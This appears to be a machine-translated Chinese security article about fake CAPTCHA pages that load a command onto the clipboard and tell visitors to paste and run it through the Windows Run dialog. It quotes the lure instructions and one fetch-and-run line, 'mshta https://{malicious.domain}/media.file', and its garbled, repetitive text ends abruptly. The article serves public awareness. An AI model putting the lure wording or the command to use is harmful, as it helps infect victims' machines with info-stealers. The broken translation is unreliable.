假验证码网站劫持您的剪贴板以安装信息窃取器

越来越多的网站使用剪贴板劫机者，并指导受害者如何感染自己的机器。

我意识到这听起来可能很琐碎，但显然不是因为它背后的社会工程非常复杂。

起初，这些攻击更具针对性的人，这些人可以在目标公司为网络犯罪分子提供立足点，但是它们的受欢迎程度越来越大，以至于现在任何人都可以遇到其中一个。

它通常从一个网站上开始，该网站向访问者保证某种流行内容：电影，音乐，图片，新闻文章，您可以命名。

当要求他们证明自己不是机器人时，没有人会三思而后行。

但是，此方法的下一步不是您通常会看到的。如果您使用复选框，则将转发到看起来像这样的东西：

“更好地证明您不是机器人，请：按＆按住Windows键 + R.在验证窗口中，按Ctrl + V.Press在键盘上输入以完成。

“更好地证明您不是机器人，请：

按键入Windows键 + R.在验证窗口中，按CTRL + V.PRESS在键盘上输入以完成。

按键保持Windows键 + R.

在验证窗口中，按CTRL +V。

按键盘上的输入完成。

您会观察并同意：“我不是机器人 - recaptcha验证ID：8253”

执行上述步骤以完成验证。”

提示中的障碍告诉您要做的是：

在Windows上打开“运行对话框”。将剪贴板的内容插入对话框中。执行您刚粘贴的命令。

打开Windows上的“运行对话框”。

将剪贴板的内容粘贴到该对话框中。

执行您粘贴的命令。

但在正常情况下，这将是可见的。

您只会看到粘贴内容的最后一部分

mshta https：// {malicious.domain}/media.file

添加